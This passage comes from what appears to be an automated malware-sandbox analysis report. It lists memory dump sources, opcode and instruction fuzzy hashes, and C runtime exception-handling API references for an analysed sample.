          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: d3c718fd24be43e1dd9ef980f5007e1fcfcb47e7ea5df4092a8597acab151f86
          • Instruction ID: ae0e24443ea172f3cac9fa3bde3fa6c2d00afa74f91d34c4194a8ccd9ba1b215
          • Opcode Fuzzy Hash: d3c718fd24be43e1dd9ef980f5007e1fcfcb47e7ea5df4092a8597acab151f86
          • Instruction Fuzzy Hash: BAD190B0A017058BDB20CF64C4507FBB7E2FF4530AF14857DD89A87286EB75A94ACB91
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: f37383dcf9f8acf018a8d637c398557ef68189a81b5bef7daf8e935d91797b39
          • Instruction ID: f077b45db2c32149ef85f2d1c093116cb5be233f7f35ccbd5045e5a6ff19c52f
          • Opcode Fuzzy Hash: f37383dcf9f8acf018a8d637c398557ef68189a81b5bef7daf8e935d91797b39
          • Instruction Fuzzy Hash: 5AB17071610605DFD764CF2CC486BA97BE2FF05364F258658E89ACF2A2C735EA81CB40
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e90efbfabbddd613c6c824727049bd3cf8f0c390fc7ab438ad8ac1b7e8215a00
          • Instruction ID: af8acb9432a75ba608548e648b891dbcae1e19a2f0172cea54cf5c75f8bbfd36
          • Opcode Fuzzy Hash: e90efbfabbddd613c6c824727049bd3cf8f0c390fc7ab438ad8ac1b7e8215a00
          • Instruction Fuzzy Hash: 35A10031A006458BE714CF68C4807EEB3F1FF89350F09867DC85AA7761E778A94ACB14
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: 61ba97cf0cbd44114090423b4466df32191acfd61c1f6e4ef0718f483b3d3a2e
          • Instruction ID: 9dafb67b6c3d658eb2a0c49260b54935959dac2ae9e5cd256a4f53e9d137e0bf
          • Opcode Fuzzy Hash: 61ba97cf0cbd44114090423b4466df32191acfd61c1f6e4ef0718f483b3d3a2e
          • Instruction Fuzzy Hash: 0351C134A102288ADF649F64C550BFFB3F0EF4A305F5195BACD4A97281EB344D86CB56
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: e4182ae9eb8838e8c5c5b135857153592dc5964a2e95149793ace3083c1df033
          • Instruction ID: 6871140e6415c40a60e6ca7c5a51c78d71a166f7473c451371417ed2e384d2a2
          • Opcode Fuzzy Hash: e4182ae9eb8838e8c5c5b135857153592dc5964a2e95149793ace3083c1df033
          • Instruction Fuzzy Hash: B0515EB1D00205CFFB68CF59D8817AEB7F6FB48354F28842AD455EB251D7B99980CB90
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: efc5aa055f2b7d5c860130e1e71fece82e33114b5bdf1545e64ec11c16537c2c
          • Instruction ID: 9415cac03281c6ec82b21f1654163c9b8f57b89c1c09bba3481c8231016924ff
          • Opcode Fuzzy Hash: efc5aa055f2b7d5c860130e1e71fece82e33114b5bdf1545e64ec11c16537c2c
          • Instruction Fuzzy Hash: 6F41D131A006459FC764CF69C98166BFBF5FF85302F48856ED986D7781C634EA4ACB10
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID:
          • String ID:
          • API String ID:
          • Opcode ID: b9005a4da64ab163c50eb2dcc20d1c1bb872def61d52f9ba0cb331cade9619df
          • Instruction ID: fcf51d1f5d1f1bba21e41b73682814bc6cd762a08b2e0561bef0e2f7cd55deb4
          • Opcode Fuzzy Hash: b9005a4da64ab163c50eb2dcc20d1c1bb872def61d52f9ba0cb331cade9619df
          • Instruction Fuzzy Hash: AF2156309140B54A875C8B2DAC22473FBD0AF4621338B42AFD99AEA0C2C53DD565DBA0
          APIs
          • IsInExceptionSpec.LIBVCRUNTIME ref: 00061EC8
          • type_info::operator==.LIBVCRUNTIME ref: 00061EEA
          • ___TypeMatch.LIBVCRUNTIME ref: 00061FF9
          • IsInExceptionSpec.LIBVCRUNTIME ref: 000620CB
          • CallUnexpected.LIBVCRUNTIME ref: 0006216A
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: ExceptionSpec$CallMatchTypeUnexpectedtype_info::operator==
          • String ID: csm$csm$csm
          • API String ID: 4162181273-393685449
          • Opcode ID: 8a53b0d1a5046381f7300a7b12b460322ba65a1f7aa2f50502cc9b10221c16d0
          • Instruction ID: a3c2290ca15aaca3580e72aebb611cb5cdc9e241f0daba9c72f851f7da22fc9b
          • Opcode Fuzzy Hash: 8a53b0d1a5046381f7300a7b12b460322ba65a1f7aa2f50502cc9b10221c16d0
          • Instruction Fuzzy Hash: 0EB1A731C00609EFDF28DFA4C8819EEBBB6BF18310F18416AE9156B212D731EA51CF91
          APIs
          • _ValidateLocalCookies.LIBCMT ref: 00061777
          • ___except_validate_context_record.LIBVCRUNTIME ref: 0006177F
          • _ValidateLocalCookies.LIBCMT ref: 00061808
          • __IsNonwritableInCurrentImage.LIBCMT ref: 00061833
          • _ValidateLocalCookies.LIBCMT ref: 00061888
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
          • String ID: csm
          • API String ID: 1170836740-1018135373
          • Opcode ID: 030f32e8edd596a0a58e31beedf78c30e2b57a1602427b47a82485cffea35743
          • Instruction ID: 2dde9b1bb5ab8607a979b4349b62c5905086e553fc2f60f0d137edb3ce45b464
          • Opcode Fuzzy Hash: 030f32e8edd596a0a58e31beedf78c30e2b57a1602427b47a82485cffea35743
          • Instruction Fuzzy Hash: E241D234E00209AFCF20DF68C881ADEBBF6FF45324F188155E8199B392CB759A55CB91
          APIs
          • __CreateFrameInfo.LIBCMT ref: 00707769
            • Part of subcall function 00707051: __getptd.LIBCMT ref: 0070705F
            • Part of subcall function 00707051: __getptd.LIBCMT ref: 0070706D
          • __getptd.LIBCMT ref: 00707773
            • Part of subcall function 006FF027: __amsg_exit.LIBCMT ref: 006FF037
          • __getptd.LIBCMT ref: 00707781
          • __getptd.LIBCMT ref: 0070778F
          • __getptd.LIBCMT ref: 0070779A
          • _CallCatchBlock2.LIBCMT ref: 007077C0
            • Part of subcall function 007070F6: __CallSettingFrame@12.LIBCMT ref: 00707142
            • Part of subcall function 00707867: __getptd.LIBCMT ref: 00707876
            • Part of subcall function 00707867: __getptd.LIBCMT ref: 00707884
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit
          • String ID:
          • API String ID: 3688206559-0
          • Opcode ID: 334ecc6cb648cf23f6d847abb4754ee2921b181d714db18bc2a8a50ce01219b6
          • Instruction ID: ece3f4f4cc7ae3a9e7fca3472c7cdaec06ab3a411884685c0695e8241fe7e405
          • Opcode Fuzzy Hash: 334ecc6cb648cf23f6d847abb4754ee2921b181d714db18bc2a8a50ce01219b6
          • Instruction Fuzzy Hash: F911E9B1C00249EFDB44EFA4D44AAAE7BF1FF08314F108169F914A7292DB799A11DF64
          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000629000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000062D000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000630000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000635000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000637000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000642000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000648000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000006E6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127779681.000000000070F000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127804451.0000000000715000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2127900493.0000000000813000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2128045332.00000000009ED000.00000002.00000001.01000000.00000003.sdmp
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_50000_vk2wTOx91s.jbxd
          Similarity
          • API ID: __getptd$__amsg_exit
          • String ID: MOC$csm
          • API String ID: 1969926928-1389381023
          • Opcode ID: b68e641eb07ff4fafb1edb55a21d12150c63f4870366f27caff06bbc5fcb7995
          • Instruction ID: 173ee481bdc4ea0acae7995d41cdb3a853ca951ecd2ae44971406aa00cfa24ae
          • Opcode Fuzzy Hash: b68e641eb07ff4fafb1edb55a21d12150c63f4870366f27caff06bbc5fcb7995
          • Instruction Fuzzy Hash: 8EE01A31904158CFC754AB64C086B2836D5FF45314F1501A5AA4CC7263CF39EC509662
          APIs
          • _ValidateScopeTableHandlers.LIBCMT ref: 007082F1
          • __FindPESection.LIBCMT ref: 0070830B
          Memory Dump Source
          • Source File: 00000000.00000002.2127745935.00000000006E7000.00000020.00000001.01000000.00000003.sdmp, Offset: 00050000, based on PE: true
          • Associated: 00000000.00000002.2126788294.0000000000050000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126811177.0000000000051000.00000020.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126836787.000000000006D000.00000002.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.000000000007C000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.00000000001A6000.00000004.00000001.01000000.00000003.sdmp
          • Associated: 00000000.00000002.2126876651.0000000000626000.00000004.00000001.01000000.00000003.sdmp
